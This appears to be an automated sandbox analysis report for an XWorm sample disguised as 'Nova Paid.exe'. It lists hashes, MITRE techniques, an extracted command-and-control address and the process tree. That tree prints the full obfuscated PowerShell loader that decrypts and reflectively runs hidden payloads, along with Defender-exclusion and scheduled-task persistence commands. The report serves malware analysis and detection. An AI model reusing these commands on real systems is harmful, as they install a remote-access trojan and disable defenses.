Analysis
-
max time kernel
62s -
max time network
64s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-09-2024 17:16
Static task
static1
General
-
Target
Nova Paid.exe
-
Size
11KB
-
MD5
af01ce81d4ab7563effd17927d6ebac2
-
SHA1
c26dc6c6739f25826f2f095079142074d622638d
-
SHA256
207c9fcb3d27479e760966b306e799b4a2a12b15716c3232aba846532da3bac7
-
SHA512
510a2471e90fa0e4f47c3a6218b32fda8fb4106cb157757eea2c77e2e60929b8940c6a3731515ce952afe25fe401cd7157294e251a8dee68caf92320cd8080e6
-
SSDEEP
96:gLkT0+4l002iKK5pQ9rmTohygkRZJte8K3dGcRJDfsjqIxbMjTH7HP+qDcFRVX2x:Ok/Mk3ygkT3e88GiIj1ojDDWqoVX2Oo
Malware Config
Extracted
xworm
ie-laugh.gl.at.ply.gg:38406
-
Install_directory
%AppData%
-
install_file
svhost.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3464-35-0x0000000007BF0000-0x0000000007C08000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 30 3464 powershell.exe 42 3464 powershell.exe 48 3464 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 876 powershell.exe 2044 powershell.exe 4172 powershell.exe 3672 powershell.exe 3464 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation Nova Paid.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 816 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Nova Paid.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3480 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 3464 powershell.exe 3464 powershell.exe 3464 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 4172 powershell.exe 4172 powershell.exe 4172 powershell.exe 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe 876 powershell.exe 876 powershell.exe 876 powershell.exe 3464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3060 Nova Paid.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeDebugPrivilege 3672 powershell.exe Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3464 powershell.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 3060 wrote to memory of 4048 3060 Nova Paid.exe 103 PID 3060 wrote to memory of 4048 3060 Nova Paid.exe 103 PID 3060 wrote to memory of 4048 3060 Nova Paid.exe 103 PID 4048 wrote to memory of 3464 4048 cmd.exe 106 PID 4048 wrote to memory of 3464 4048 cmd.exe 106 PID 4048 wrote to memory of 3464 4048 cmd.exe 106 PID 3464 wrote to memory of 816 3464 powershell.exe 109 PID 3464 wrote to memory of 816 3464 powershell.exe 109 PID 3464 wrote to memory of 2044 3464 powershell.exe 111 PID 3464 wrote to memory of 2044 3464 powershell.exe 111 PID 3464 wrote to memory of 2044 3464 powershell.exe 111 PID 3464 wrote to memory of 4172 3464 powershell.exe 113 PID 3464 wrote to memory of 4172 3464 powershell.exe 113 PID 3464 wrote to memory of 4172 3464 powershell.exe 113 PID 3464 wrote to memory of 3672 3464 powershell.exe 115 PID 3464 wrote to memory of 3672 3464 powershell.exe 115 PID 3464 wrote to memory of 3672 3464 powershell.exe 115 PID 3464 wrote to memory of 876 3464 powershell.exe 117 PID 3464 wrote to memory of 876 3464 powershell.exe 117 PID 3464 wrote to memory of 876 3464 powershell.exe 117 PID 3464 wrote to memory of 3480 3464 powershell.exe 119 PID 3464 wrote to memory of 3480 3464 powershell.exe 119 PID 3464 wrote to memory of 3480 3464 powershell.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nova Paid.exe"C:\Users\Admin\AppData\Local\Temp\Nova Paid.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\XClient.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JX+Z0G+TBwPu7Jfx2kdpxB/Zi+U9k9ENCMdrmmQAb+E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mP9lUTV3X5KEU5RrJggJng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NMBph=New-Object System.IO.MemoryStream(,$param_var); $BTBHa=New-Object System.IO.MemoryStream; $jdGzb=New-Object System.IO.Compression.GZipStream($NMBph, [IO.Compression.CompressionMode]::Decompress); $jdGzb.CopyTo($BTBHa); $jdGzb.Dispose(); $NMBph.Dispose(); $BTBHa.Dispose(); $BTBHa.ToArray();}function execute_function($param_var,$param2_var){ $arChD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $miCBY=$arChD.EntryPoint; $miCBY.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\XClient.bat';$FwhDJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\XClient.bat').Split([Environment]::NewLine);foreach ($IkMcm in $FwhDJ) { if ($IkMcm.StartsWith(':: ')) { $MzgrP=$IkMcm.Substring(3); break; }}$payloads_var=[string[]]$MzgrP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Users\Admin\AppData\Local\Temp\cmd.exe"C:\Users\Admin\AppData\Local\Temp\cmd.exe"4⤵
- Executes dropped EXE
PID:816
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3480
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3760,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:81⤵PID:4168
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD56b6511f92720adfa896432b003c0a3e5
SHA1f090d371d8ff332b85fc3cec50cabf805bbf6c81
SHA256459649b45c0dcaf0bd3a54c91851a6fe980413ab43f6d6af62427e0c2b8fa72b
SHA512447e1da707394e1e490213c615a93a6dbdc1cbd728760d50c5d212daba04432847ce2e1eb36e2151efa51091136c8d75af76137910f066bcbe36f3b492f6efc3
-
Filesize
18KB
MD544ceaa6edec11affa08d1ce7acd2ed7e
SHA1c25555b301d5c3febb13a75872257320d0ab784a
SHA25666c82ad53e530231906bc8f111044eb1dcd6a6ffb9afa9519e60585fd3abbb42
SHA512e77f467928bcc7d59a342def13a144f57f0cd9e0f2222eb78ac09b10ca9baaad46aff480cdbb6bd356124e011fd6288a762cb75596d751236b1f13aeb302eedb
-
Filesize
18KB
MD57e54625e3dec2bc589df483591c46f40
SHA1f7bff903b5b08e19e64df06f4f1e99617a73182a
SHA256c1a8b4a1fa6b2b3896badab8d44ade4ab88501db908ba9ff184a47095c0e3e4b
SHA5120ac5b6d9c951eecd414ee12da5770f35d96602653070b69250a391b4d845bf6d28f2552ba47da2304d8df29e0e13b462933fafb0f911dd2907ba9068bd66b6f7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
316KB
MD5428cec6b0034e0f183eb5bae887be480
SHA17140caf2a73676d1f7cd5e8529db861f4704c939
SHA2563f6aa206177bebb29fc534c587a246e0f395941640f3f266c80743af95a02150
SHA512509b8c138c4928524b4830488a96bd7e4bc7db2c494b10c68e1edcf7d901879126168eaa6635818d29734540f8400e376e5716a3b4dc052cba4e267bbaad7253
-
Filesize
286KB
MD5f25183dac62c017a5463fa69cb7a2c4e
SHA173bef2139b8291017f45869ce68e6ac7c148cf7f
SHA256bcbb825c1accbf40be97c820c30aa8dd195a050f3ad8d605a7db1a6038824483
SHA51272f746eb8984a5fb7a1f485b76cf9892889b6d6f1a9f031f0ea5dd81f0ee5ccf200a95571346a5fd04ddee197d39218d2d8a3e63f5b2d9cdfb47ffe6f79efb02